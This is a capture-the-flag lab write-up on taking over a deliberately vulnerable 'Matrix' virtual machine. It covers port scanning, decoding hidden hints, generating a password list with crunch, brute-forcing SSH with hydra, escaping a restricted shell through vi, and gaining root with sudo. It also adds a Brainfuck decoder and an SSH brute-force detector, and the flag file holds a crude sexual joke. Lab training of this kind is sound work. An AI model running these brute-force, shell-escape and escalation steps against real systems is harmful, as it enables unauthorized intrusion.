Lab – Matrix

The Matrix has you! Another quite easy machine to take down this Monday. It's more of a CTF puzzle than a realistic target, but it's really entertaining nonetheless.

This time the machine boots to a nice welcome screen. But since we have no idea what the password is, it's as pretty as it is useless.

matrix_01

Now to enumeration:

root@kali:~# nmap -sV -sC -O -A 192.168.89.130
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-16 07:10 EDT
Nmap scan report for 192.168.89.130
Host is up (0.00042s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.7 (protocol 2.0)
| ssh-hostkey: 
| 2048 9c:8b:c7:7b:48:db:db:0c:4b:68:69:80:7b:12:4e:49 (RSA)
| 256 49:6c:23:38:fb:79:cb:e0:b3:fe:b2:f4:32:a2:70:8e (ECDSA)
|_ 256 53:27:6f:04:ed:d1:e7:81:fb:00:98:54:e6:00:84:4a (ED25519)
80/tcp open http SimpleHTTPServer 0.6 (Python 2.7.14)
|_http-server-header: SimpleHTTP/0.6 Python/2.7.14
|_http-title: Welcome in Matrix
31337/tcp open http SimpleHTTPServer 0.6 (Python 2.7.14)
|_http-title: Welcome in Matrix
MAC Address: 00:0C:29:CB:4D:88 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT ADDRESS
1 0.42 ms 192.168.89.130

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.38 seconds

We've got SSH access and two web servers: one on the standard port 80 and one on the odd port 31337. I wonder if 31337 is a reference to the movie.

Ok, let’s check out the website:

matrix_02

Hmm, nothing important. But if we check the page source, we find a reference to an image:

port_31337.png looks like this:

matrix_03

Oh, I get it: "Follow the white rabbit". The number 31337 must mean something important. Remember that we saw a web server on this port during the initial scan. Let's go there:

matrix_04

Another web page with no active content. In the page source there's an interesting string:

It's base64-encoded text, so it's not hard to "decrypt" it:

root@kali:~# echo ZWNobyAiVGhlbiB5b3UnbGwgc2VlLCB0aGF0IGl0IGlzIG5vdCB0aGUgc3Bvb24gdGhhdCBiZW5kcywgaXQgaXMgb25seSB5b3Vyc2VsZi4gIiA+IEN5cGhlci5tYXRyaXg= | base64 -d
echo "Then you'll see, that it is not the spoon that bends, it is only yourself. " > Cypher.matrix

Here's another movie quote, and it points to a file with a .matrix extension. Let's try it then:

matrix_05

A needle straight out of the haystack. Cypher.matrix is indeed a file we can download and read. It reads, well...

matrix_06

This is a Matrix =) It doesn't make any sense, but Google suggests that this "thing" is written in Brainfuck, an esoteric programming language created in 1993 by Urban Müller. I have no idea how to read this, so I just googled for a translator.

matrix_07
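An online translator works, but a file like Cypher.matrix can just as well be decoded offline. Here is a small Brainfuck interpreter as an added example; it is not code from the original post, and the embedded program is a constructed sample that simply prints "Hi".

```python
# Added example: a minimal Brainfuck interpreter, so a file like Cypher.matrix
# can be decoded offline instead of pasting it into a web translator.
# Not code from the original post; the sample program below is constructed.

def build_jump_table(code):
    """Pre-compute matching bracket positions; raise on unbalanced brackets."""
    stack, jumps = [], {}
    for pos, ch in enumerate(code):
        if ch == "[":
            stack.append(pos)
        elif ch == "]":
            if not stack:
                raise ValueError(f"unmatched ']' at offset {pos}")
            start = stack.pop()
            jumps[start], jumps[pos] = pos, start
    if stack:
        raise ValueError(f"unmatched '[' at offset {stack[-1]}")
    return jumps

def run_brainfuck(code, stdin=b"", cells=30000):
    """Execute Brainfuck source and return its output as bytes (8-bit wrapping cells)."""
    code = "".join(c for c in code if c in "<>+-.,[]")  # everything else is a comment
    jumps = build_jump_table(code)
    tape, ptr, pc = bytearray(cells), 0, 0
    out, inp = bytearray(), list(stdin)
    while pc < len(code):
        op = code[pc]
        if op == ">":
            ptr = (ptr + 1) % cells
        elif op == "<":
            ptr = (ptr - 1) % cells
        elif op == "+":
            tape[ptr] = (tape[ptr] + 1) & 0xFF
        elif op == "-":
            tape[ptr] = (tape[ptr] - 1) & 0xFF
        elif op == ".":
            out.append(tape[ptr])
        elif op == ",":
            tape[ptr] = inp.pop(0) if inp else 0  # EOF reads as 0
        elif op == "[" and tape[ptr] == 0:
            pc = jumps[pc]  # skip the loop body
        elif op == "]" and tape[ptr] != 0:
            pc = jumps[pc]  # jump back to the loop start
        pc += 1
    return bytes(out)

# Constructed sample program; it prints "Hi". A real Cypher.matrix would be read from disk.
SAMPLE = "++++++++[>+++++++++<-]>.>++++++++++[>++++++++++<-]>+++++."
```

Run it on the downloaded file with `run_brainfuck(open("Cypher.matrix").read())`.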

Got it. I think with the correct login and password we can access the machine via SSH. We have to brute-force the password, since the author is so forgetful. The easiest way is to generate a password list and use it with hydra. We have a clue from the previous step, so only the last two characters are unknown:

root@kali:~# crunch 8 8 -t k1ll0r@@ -f /usr/share/crunch/charset.lst lalpha-numeric-symbol14 -o mypassword.txt
Crunch will now generate the following amount of data: 22500 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 2500

That gives us 2500 passwords, so it might take some time:

root@kali:~# hydra -l guest -P mypassword.txt 192.168.89.130 ssh
Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-05-16 08:07:58
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 2500 login tries (l:1/p:2500), ~157 tries per task
[DATA] attacking ssh://192.168.89.130:22/
[STATUS] 180.00 tries/min, 180 tries in 00:01h, 2324 to do in 00:13h, 16 active
[STATUS] 166.67 tries/min, 500 tries in 00:03h, 2004 to do in 00:13h, 16 active
[STATUS] 151.43 tries/min, 1060 tries in 00:07h, 1444 to do in 00:10h, 16 active

[22][ssh] host: 192.168.89.130 login: guest password: k1ll0r7n
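A run like this is very loud on the target: hydra sends a steady stream of failed password attempts from one address, followed by a single success. As an added example (not code from the original post), here is the detection logic that would flag it from sshd auth-log lines; the log lines below are constructed and assume the default sshd log format.

```python
# Added example (not from the original post): spot an SSH password brute force
# like the hydra run above in sshd auth-log lines. All log lines are constructed.
import re
from collections import defaultdict
from datetime import datetime, timedelta

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+ ssh2$"
)

def parse_auth_line(line, year=2019):
    """Return (timestamp, result, user, ip), or None for lines that are not password events."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["ip"]

def detect_ssh_bruteforce(lines, threshold=10, window=timedelta(minutes=1)):
    """Alert on source IPs with >= threshold failures inside a sliding window and
    record whether a later successful login from that IP followed the failures."""
    recent = defaultdict(list)  # ip -> failure timestamps still inside the window
    alerts = {}
    for line in lines:
        ev = parse_auth_line(line)
        if ev is None:
            continue
        ts, result, user, ip = ev
        if result == "Failed":
            recent[ip] = [t for t in recent[ip] if ts - t <= window] + [ts]
            if len(recent[ip]) >= threshold:
                a = alerts.setdefault(ip, {"failures": 0, "success_after": None})
                a["failures"] = max(a["failures"], len(recent[ip]))
        elif ip in alerts:  # "Accepted" from a flagged IP: the password was likely guessed
            alerts[ip]["success_after"] = user
    return alerts

# Constructed sample: 16 failures within one minute from one host, then a success,
# plus a single unrelated failure from another host that must not trigger an alert.
SAMPLE_LOG = [
    f"May 16 08:08:{s:02d} porteus sshd[{1000 + s}]: Failed password for guest "
    f"from 192.168.89.1 port {40000 + s} ssh2"
    for s in range(16)
] + [
    "May 16 08:09:30 porteus sshd[1100]: Accepted password for guest from 192.168.89.1 port 40100 ssh2",
    "May 16 08:09:45 porteus sshd[1101]: Failed password for invalid user admin from 192.168.89.50 port 50000 ssh2",
]
```

The "success after failures" flag is the one worth paging on: a burst of failures followed by an accepted login from the same address is exactly what the hydra output above produced.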

OK, we have the correct password. Let's use it with SSH:

root@kali:~# ssh guest@192.168.89.130
The authenticity of host '192.168.89.130 (192.168.89.130)' can't be established.
ECDSA key fingerprint is SHA256:BMhLOBAe8UBwzvDNexM7vC3gv9ytO1L8etgkkIL8Ipk.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.89.130' (ECDSA) to the list of known hosts.
guest@192.168.89.130's password: 
guest@porteus:~$ ls
-rbash: /bin/ls: restricted: cannot specify `/' in command names

Something is wrong here. We've got access, but it's restricted by rbash. This is a common way for an administrator to limit what a guest account can run. Luckily there are ways around this restriction:

guest@porteus:~$ echo /home/guest/prog/*
/home/guest/prog/vi

Great, we have vi. I hate vi, except for moments like this one =) Let's start vi and run a command from inside it:

:!/bin/bash

Now we are in a proper shell, but we're still just a user. Before we can escalate our privileges we need a working PATH, which rbash had stripped, so we set it with a simple command:

export PATH=/usr/bin:/bin

Got it, now let's see what we are allowed to run with sudo:

guest@porteus:~$ sudo -l
User guest may run the following commands on porteus:
(ALL) ALL
(root) NOPASSWD: /usr/lib64/xfce4/session/xfsm-shutdown-helper
(trinity) NOPASSWD: /bin/cp

It seems that we can just run sudo su now and try the password we already have:

guest@porteus:~$ sudo su

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.

Password:

root@porteus:/home/guest#

And it does the trick. Now where is our flag, Mr. Anderson?

root@porteus:/home/guest# cd /root
root@porteus:~# ls
Desktop/ Documents/ Downloads/ Music/ Pictures/ Public/ Videos/ flag.txt
root@porteus:~# cat flag.txt 
   _,-. 
,-'  _|                EVER REWIND OVER AND OVER AGAIN THROUGH THE
|_,-O__`-._            INITIAL AGENT SMITH/NEO INTERROGATION SCENE
|`-._\`.__ `_.         IN THE MATRIX AND BEAT OFF 
|`-._`-.\,-'_|    _,-'. 
      `-.|.-'|   |`.-'|_   WHAT 
         |       |_|,-'_`. 
                |-._,-'  |   NO, ME NEITHER 
           jrei | |    _,' 
                '-|_,-'         IT'S JUST A HYPOTHETICAL QUESTION

Here it is.
